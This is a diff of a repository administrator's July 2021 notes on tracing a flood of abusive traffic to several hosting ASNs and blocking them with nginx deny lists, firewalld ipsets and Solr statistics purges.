                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├TYP  Proxy host   Hosting/DC 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               ├GEO Los Angeles, California (US)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +               └REP ✓ NONE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Slowly slowly I manually built up a list of the IPs, ISP names, and network blocks, for example:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    IP, Organization, Website, Network
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @@ -496,56 +496,56 @@ postgres@linode18:~$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_ac
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                # grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq  > /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -# wc -l /tmp/ips-sorted.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -10776 /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  # grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" /var/log/nginx/access.log | awk '{print $1}' | sort | uniq  > /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +# wc -l /tmp/ips-sorted.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +10776 /tmp/ips-sorted.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Then resolve them all:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ ./ilri/resolve-addresses-geoip2.py -i /tmp/ips-sorted.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   
• Then get the top 10 organizations and top 10 ASNs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csvcut -c 2 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    213 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    218 ASN-QUADRANET-GLOBAL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    246 Silverstar Invest Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    347 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    475 DEDIPATH-LLC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    504 AS-COLOCROSSING
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    598 UAB Rakrejus
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    814 UGB Hosting OU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1010 ST-BGP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1757 Global Layer B.V.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 3 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    213 14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    218 8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    246 35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    347 24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    475 35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    504 36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    598 62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    814 206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1010 46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1757 49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvcut -c 2 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    213 AMAZON-AES
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    218 ASN-QUADRANET-GLOBAL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    246 Silverstar Invest Limited
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    347 Ethiopian Telecommunication Corporation
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    475 DEDIPATH-LLC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    504 AS-COLOCROSSING
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    598 UAB Rakrejus
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    814 UGB Hosting OU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1010 ST-BGP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1757 Global Layer B.V.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 3 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    213 14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    218 8100
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    246 35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    347 24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    475 35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    504 36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    598 62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    814 206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1010 46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1757 49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
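The two `csvcut | sort | uniq -c` pipelines above can also be sketched in Python, which may be handier if the counts need further processing. This is a minimal sketch, not the method used in the log: it assumes `/tmp/out.csv` has a header row with the organization in the second column and the ASN in the third (inferred from the `csvcut -c 2` and `-c 3` calls), and the `top_values` helper, the header names, and the sample rows are all hypothetical.

```python
import csv
from collections import Counter
from io import StringIO

# Hypothetical sample in the assumed layout: ip, org, asn.
# Addresses and ASNs come from documentation/private-use ranges.
SAMPLE = (
    "ip,org,asn\n"
    "192.0.2.1,Example Hosting,64500\n"
    "192.0.2.2,Example Hosting,64500\n"
    '198.51.100.7,"Example Telecom, Inc.",64501\n'
    "203.0.113.9,Example Hosting,64500\n"
)


def top_values(csv_file, column_index, n=10):
    """Return the n most frequent values in one column as (value, count) pairs."""
    reader = csv.reader(csv_file)
    next(reader, None)  # skip the header row, like `sed 1d`
    counts = Counter(
        row[column_index] for row in reader if len(row) > column_index
    )
    # most_common() sorts by descending count, the reverse of `sort -n | tail`
    return counts.most_common(n)


if __name__ == "__main__":
    # Column index 1 is the second column (organization), index 2 the third (ASN)
    for value, count in top_values(StringIO(SAMPLE), 1):
        print(f"{count:7d} {value}")
    for value, count in top_values(StringIO(SAMPLE), 2):
        print(f"{count:7d} {value}")
```

To run it against the real file, pass `open("/tmp/out.csv", newline="")` instead of the `StringIO` sample. Unlike the shell pipeline, the largest count is listed first.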
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • I will download blocklists for all these except Ethiopian Telecom, Quadranet, and Amazon, though I’m concerned about Global Layer because it’s a huge ASN that seems to have legit hosts too…?
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ wget https://asn.ipinfo.app/api/text/nginx/AS49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ cat AS* | sort | uniq > /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -$ wc -l /tmp/abusive-networks.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -2276 /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ wget https://asn.ipinfo.app/api/text/nginx/AS49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wget https://asn.ipinfo.app/api/text/nginx/AS35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ cat AS* | sort | uniq > /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +$ wc -l /tmp/abusive-networks.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +2276 /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Combining with my existing rules and filtering uniques:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -2298
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ cat roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | grep deny | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +2298
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
• According to Scamalytics all these are high-risk ISPs (as recently as 2021-06) so I will just keep blocking them
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • I deployed the block list on CGSpace (linode18) and the load is down to 1.0 but I see there are still some DDoS IPs getting through… sigh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • The next thing I need to do is purge all the IPs from Solr using grepcidr…
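The "combine and filter uniques" step above can be wrapped in a small helper. This is only a sketch: the function name `merge_deny_rules` is hypothetical, and it assumes each rule sits on its own line starting with `deny` (optionally indented), which is slightly stricter than the plain `grep deny` used in these notes.

```shell
#!/usr/bin/env bash
# Merge nginx "deny" rules from one or more files and print each unique rule once.
# Assumption: one rule per line, e.g. "deny 192.0.2.0/24;", possibly indented.
merge_deny_rules() {
    # grep -h suppresses file name prefixes when several files are given;
    # sed strips leading indentation so identical rules compare equal;
    # sort -u is equivalent to "sort | uniq".
    grep -h '^[[:space:]]*deny ' "$@" | sed 's/^[[:space:]]*//' | sort -u
}
```

Something like `merge_deny_rules roles/dspace/templates/nginx/abusive-networks.conf.j2 /tmp/abusive-networks.txt | wc -l` should then give the same kind of count as the pipeline above, as long as the template contains no other lines mentioning "deny".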
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • @@ -558,12 +558,12 @@ $ wc -l /tmp/abusive-networks.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E " (200|499) " | awk '{print $1}' | sort | uniq > /tmp/all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -$ wc -l /tmp/all-ips-to-block.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -5095 /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        $ sudo zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.2 | grep -E " (200|499) " | awk '{print $1}' | sort | uniq > /tmp/all-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips.txt -o /tmp/all-ips-out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c ip | sed 1d | sort | uniq > /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +$ wc -l /tmp/all-ips-to-block.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +5095 /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Then I added them to the normal ipset we are already using with firewalld
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I will check again in a few hours and ban more
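Adding a file of addresses to an existing firewalld ipset could look roughly like the sketch below. The function name `add_ips_to_ipset` and the `FIREWALL_CMD` override are hypothetical (the override only exists so the helper can be dry-run with `echo`), and the real ipset name on the server is not given in these notes.

```shell
#!/usr/bin/env bash
# Add every entry in a file (one IP or network per line) to a firewalld ipset.
# Assumptions: the ipset already exists in the permanent configuration, and
# FIREWALL_CMD may be set to another command (e.g. echo) for a dry run.
add_ips_to_ipset() {
    local ipset_name=$1
    local ip_file=$2
    local fw=${FIREWALL_CMD:-firewall-cmd}

    # Refuse to run with a missing or empty file
    if [ ! -s "$ip_file" ]; then
        echo "no entries in $ip_file" >&2
        return 1
    fi

    # Update the permanent configuration, then reload to apply it
    "$fw" --permanent --ipset="$ipset_name" --add-entries-from-file="$ip_file" &&
        "$fw" --reload
}
```

For example, `FIREWALL_CMD=echo add_ips_to_ipset some-ipset /tmp/all-ips-to-block.txt` prints the two commands instead of running them, where `some-ipset` is a placeholder name.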
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • @@ -571,10 +571,10 @@ $ wc -l /tmp/all-ips-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • I decided to extract the networks from the GeoIP database with resolve-addresses-geoip2.py so I can block them more efficiently than using the 5,000 IPs in an ipset:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          $ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/all-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -2354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            $ csvgrep -c asn -r '^(206485|35624|36352|46844|49453|62282)$' /tmp/all-ips-out.csv | csvcut -c network | sed 1d | sort | uniq > /tmp/all-networks-to-block.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +$ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +2354
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Combined with the previous networks this brings about 200 more for a total of 2,354 networks
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • I think I need to re-work the ipset stuff in my common Ansible role so that I can add such abusive networks as an iptables ipset / nftables set, and have a cron job to update them daily (from Spamhaus’s DROP and EDROP lists, for example)
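As a rough sketch of what the daily update could do, the helpers below turn a Spamhaus-style list into nftables `add element` statements. Everything named here is an assumption: the functions `parse_drop_list` and `render_nft_elements`, the `inet filter` table, and the `abusive_networks` set are hypothetical, and the input is assumed to be the plain-text format of `network ; reference` lines with `;` comments (check the current Spamhaus documentation for the format actually published today).

```shell
#!/usr/bin/env bash
# Extract unique CIDR networks from a DROP-style text list on stdin.
# Assumed format: "1.10.16.0/20 ; SBL256894", comment lines start with ";".
parse_drop_list() {
    awk -F';' '
        /^[[:space:]]*;/ { next }          # skip comment lines
        {
            gsub(/[[:space:]]/, "", $1)    # trim whitespace around the network
            if ($1 != "") print $1         # ignore blank lines
        }
    ' | sort -u
}

# Turn networks on stdin into nftables statements, one per line.
# The table "inet filter" and set "abusive_networks" are hypothetical names;
# a set holding CIDR ranges would need to be created with "flags interval".
render_nft_elements() {
    while IFS= read -r network; do
        printf 'add element inet filter abusive_networks { %s }\n' "$network"
    done
}
```

A cron job could then download the list, run it through `parse_drop_list | render_nft_elements`, write the result to a file, and load that file with `nft -f`. Keeping the parsing separate from the rendering means the same network list could also feed an iptables ipset.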
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • @@ -582,51 +582,51 @@ $ grep deny roles/dspace/templates/nginx/abusive-networks.conf.j2 | sort | uniq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I got a list of all the 5,095 IPs from above and used check-spider-ip-hits.sh to purge them from Solr:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -Total number of bot hits purged: 197116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ilri/check-spider-ip-hits.sh -f /tmp/all-ips-to-block.txt -p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +Total number of bot hits purged: 197116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I started a harvest on AReS and it finished in a few hours now that the load on CGSpace is back to a normal level
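The idea above of feeding a blocklist into an nftables set from a daily cron job could be sketched roughly as follows. This is only an illustration under stated assumptions, not the Ansible role's actual implementation: it assumes the list is plain text with one CIDR per line and `;` starting a comment, and the table name `inet filter`, the set name `abusive_networks`, and both function names are hypothetical. It handles IPv4 only and assumes the target set was created with `flags interval` so that it accepts CIDR ranges.

```python
import ipaddress


def parse_drop_list(text):
    """Return the IPv4 networks found in DROP-style text (assumed format)."""
    networks = []
    for line in text.splitlines():
        # Assumption: everything after ';' is a comment, e.g. "192.0.2.0/24 ; SBL123"
        entry = line.split(";", 1)[0].strip()
        if not entry:
            continue
        network = ipaddress.ip_network(entry, strict=False)
        if network.version == 4:
            networks.append(network)
    return networks


def render_nft_command(networks, table="inet filter", set_name="abusive_networks"):
    """Build one 'add element' statement for a hypothetical nftables set."""
    # Merge adjacent and overlapping ranges so the set stays small
    collapsed = list(ipaddress.collapse_addresses(networks))
    if not collapsed:
        return ""
    elements = ", ".join(str(network) for network in collapsed)
    return f"add element {table} {set_name} {{ {elements} }}"


if __name__ == "__main__":
    # Made-up sample using documentation ranges, not real blocklist data
    sample = """\
; sample list
192.0.2.0/25 ; example-1
192.0.2.128/25 ; example-2
198.51.100.0/24 ; example-3
"""
    print(render_nft_command(parse_drop_list(sample)))
```

A cron job could write the resulting statement to a file and load it with `nft -f`, flushing the set first so that removed networks do not linger.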

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-07-20

• Looking again at the IPs making connections to CGSpace over the last few days from these seven ASNs, the number is much higher than I noticed yesterday:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -5643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +5643
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • I purged 27,000 more hits from the Solr stats using this new list of IPs with my check-spider-ip-hits.sh script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Surprise surprise, I checked the nginx logs from 2021-06-23 when we last had issues with thousands of XMLUI sessions and PostgreSQL connections and I see IPs from the same ASNs!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  $ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/all-ips-june-23.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    265 GOOGLE,15169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    277 Silverstar Invest Limited,35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    280 FACEBOOK,32934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    288 SAFARICOM-LIMITED,33771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    399 AMAZON-AES,14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    455 Opera Software AS,39832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    481 MTN NIGERIA Communication limited,29465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    502 DEDIPATH-LLC,35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    506 AS-COLOCROSSING,36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    602 UAB Rakrejus,62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    822 ST-BGP,46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    874 Ethiopian Telecommunication Corporation,24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -    912 UGB Hosting OU,206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -   1607 Global Layer B.V.,49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ sudo zcat --force /var/log/nginx/access.log.27.gz /var/log/nginx/access.log.28.gz | grep -E " (200|499) " | grep -v -E "(mahider|Googlebot|Turnitin|Grammarly|Unpaywall|UptimeRobot|bot)" | awk '{print $1}' | sort | uniq > /tmp/all-ips-june-23.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ ./ilri/resolve-addresses-geoip2.py -i /tmp/all-ips-june-23.txt -o /tmp/out.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +$ csvcut -c 2,4 /tmp/out.csv | sed 1d | sort | uniq -c | sort -n | tail -n 15
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    265 GOOGLE,15169
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    277 Silverstar Invest Limited,35624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    280 FACEBOOK,32934
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    288 SAFARICOM-LIMITED,33771
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    399 AMAZON-AES,14618
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    427 MICROSOFT-CORP-MSN-AS-BLOCK,8075
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    455 Opera Software AS,39832
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    481 MTN NIGERIA Communication limited,29465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    502 DEDIPATH-LLC,35913
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    506 AS-COLOCROSSING,36352
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    602 UAB Rakrejus,62282
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    822 ST-BGP,46844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    874 Ethiopian Telecommunication Corporation,24757
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +    912 UGB Hosting OU,206485
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +   1607 Global Layer B.V.,49453
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Again it was over 5,000 IPs:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -5228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ csvgrep -c asn -r '^(49453|46844|206485|62282|36352|35913|35624)$' /tmp/out.csv | csvcut -c ip | sed 1d | sort | uniq | wc -l         
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +5228
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • Interestingly, it seems these are five thousand different IP addresses than the attack from last weekend, as there are over 10,000 unique ones if I combine them!
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      $ cat /tmp/ips-june23.txt /tmp/ips-jul16.txt | sort | uniq | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -10458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        +
